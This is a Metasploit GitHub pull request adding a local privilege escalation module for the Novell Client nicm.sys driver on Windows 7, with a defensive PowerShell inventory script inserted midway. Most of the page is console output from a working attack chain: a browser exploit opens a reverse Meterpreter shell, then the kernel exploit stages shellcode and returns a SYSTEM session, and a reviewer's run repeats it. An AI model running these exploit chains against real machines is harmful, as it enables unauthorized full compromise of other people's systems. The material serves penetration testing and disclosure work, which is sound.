
Add module for OSVDB 93718 #2018

Merged
merged 1 commit into from Jun 25, 2013

Conversation

jvazquez-r7
Contributor

Windows Local Privilege Escalation through the nicm.sys driver installed with Novell Client 2 SP3 for Windows 7.

Software can be downloaded from: http://download.novell.com/Download?buildid=WVA4kcizKVw~

Tested successfully on Windows 7 SP1 with Novell Client 2 SP3. In order to test, first of all an unprivileged meterpreter session is needed. It can be accomplished with msfpayload or with an existing exploit. I love the browser exploit / Windows kernel exploit combo to bypass IE protected mode and escalate all the privs :P

  • Get unprivileged session (did with ms13_037_svg_dashstyle just for fun but anything can be used)
msf > use exploit/windows/browser/ms13_037_svg_dashstyle 
msf exploit(ms13_037_svg_dashstyle) > set URIPATH /
URIPATH => /
msf exploit(ms13_037_svg_dashstyle) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.4:8080/
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > [*] 192.168.0.4      ms13_037_svg_dashstyle - Requesting: /
[*] 192.168.0.4      ms13_037_svg_dashstyle - Target selected as: IE 8 on Windows 7 SP1 with JRE ROP
[*] 192.168.0.4      ms13_037_svg_dashstyle - Using JRE ROP
[*] 192.168.0.4      ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (751104 bytes) to 192.168.0.4
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51861) at 2013-06-24 23:48:48 -0500
[*] Session ID 1 (192.168.0.4:4444 -> 192.168.0.4:51861) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2368)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 816
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Users\Juan Vazquez\Desktop
meterpreter > mkdir pwn
Creating directory: pwn
[-] stdapi_fs_mkdir: Operation failed: Access is denied.
meterpreter > background
[*] Backgrounding session 1...

  • Exploit the local kernel vuln and get a new powerful session!
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/novell_client_nicm 
msf exploit(novell_client_nicm) > set session 1
session => 1
msf exploit(novell_client_nicm) > check
[*] The target service is running, but could not be validated.
msf exploit(novell_client_nicm) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 192.168.0.4:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[*] {"GetLastError"=>0, "return"=>0, "BaseAddress"=>"\x00\x00\r\r", "RegionSize"=>"\x00\x10\x00\x00"}
[*] Fixnum : 218955776
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[*] {"GetLastError"=>0, "return"=>0, "BaseAddress"=>"\x00\x00\f\f", "RegionSize"=>"\x00\x10\x00\x00"}
[+] Contents successfully written to 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy!
[*] Meterpreter session 2 opened (192.168.0.4:4444 -> 192.168.0.4:51864) at 2013-06-24 23:49:33 -0500
[*] Exploit completed, but no session was created.
msf exploit(novell_client_nicm) > 
[*] Session ID 2 (192.168.0.4:4444 -> 192.168.0.4:51864) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: notepad.exe (816)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2784
[+] Successfully migrated to process 

msf exploit(novell_client_nicm) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.0.4:4444 -> 192.168.0.4:51861 (192.168.172.196)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-RNJ7NBRK9L7           192.168.0.4:4444 -> 192.168.0.4:51864 (192.168.172.196)

msf exploit(novell_client_nicm) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Users\Juan Vazquez\Desktop
meterpreter > mkdir pwn
Creating directory: pwn
meterpreter > cd pwn
meterpreter > pwd
C:\Users\Juan Vazquez\Desktop\pwn
meterpreter > exit
[*] Shutting down Meterpreter...

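An added defender-side inventory check, not code from this PR or from the Metasploit module, that a Windows admin can run to find hosts still carrying the nicm.sys driver the module targets. It assumes the driver's service name is nicm (the PR only shows the device name \\.\nicm) and that Novell Client registers under the standard Uninstall registry keys.

```powershell
# Added inventory check (not part of the Metasploit module or this PR): locates the Novell
# nicm.sys driver that the local privilege escalation module targets, so affected hosts
# can be found and patched or have the client removed.
# Assumptions: the driver's service name is 'nicm' (device \\.\nicm per the PR), and the
# Novell Client product entry has a DisplayName containing 'Novell Client'.

function Get-NicmDriverExposure {
    # Win32_SystemDriver lists kernel-mode drivers with their state and binary path.
    $drivers = Get-WmiObject -Class Win32_SystemDriver |
        Where-Object { $_.Name -eq 'nicm' -or $_.PathName -match 'nicm\.sys$' }

    # Uninstall keys (native and 32-bit views) for the Novell Client product entry.
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    $client = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*Novell Client*' } |
        Select-Object -First 1

    $os = Get-WmiObject -Class Win32_OperatingSystem

    foreach ($d in $drivers) {
        # WMI sometimes reports the path with a \??\ prefix; strip it before Test-Path.
        $file = $d.PathName -replace '^\\\?\?\\', ''
        $version = $null
        if (Test-Path $file) { $version = (Get-Item $file).VersionInfo.FileVersion }
        [PSCustomObject]@{
            ComputerName  = $env:COMPUTERNAME
            OS            = "$($os.Caption) $($os.CSDVersion)"
            DriverName    = $d.Name
            DriverState   = $d.State       # 'Running' means the \\.\nicm device is reachable
            StartMode     = $d.StartMode
            DriverPath    = $file
            DriverVersion = $version
            ClientProduct = $client.DisplayName
            ClientVersion = $client.DisplayVersion
        }
    }
}

# Run locally; pipe to Export-Csv or wrap in Invoke-Command for a fleet-wide sweep.
Get-NicmDriverExposure | Format-List
```

No output means no nicm driver was found by service name or binary path on that host.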

@wchen-r7
Contributor

Works for me, module description reads well, passes msftidy... merging:

msf exploit(novell_client_nicm) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Adding the railgun stuff...
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[+] Memory allocated at 0xd0d0000
[+] 0xd0d0000 is now writable
[+] Contents successfully written to 0xd0d0000
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[+] Memory allocated at 0xc0c0000
[+] 0xc0c0000 is now writable
[+] Contents successfully written to 0xc0c0000
[*] Executing the payload...
[*] Creating the thread to execute the shellcode...
[*] Resuming the Thread...
[*] Sending stage (751104 bytes) to 10.0.1.78
[+] Enjoy!
[*] Meterpreter session 3 opened (10.0.1.76:4444 -> 10.0.1.78:49159) at 2013-06-25 02:24:02 -0500

meterpreter >

@wchen-r7 wchen-r7 merged commit 795dd6a into rapid7:master Jun 25, 2013
@jvazquez-r7 jvazquez-r7 deleted the novell_client_nicm branch November 18, 2014 15:52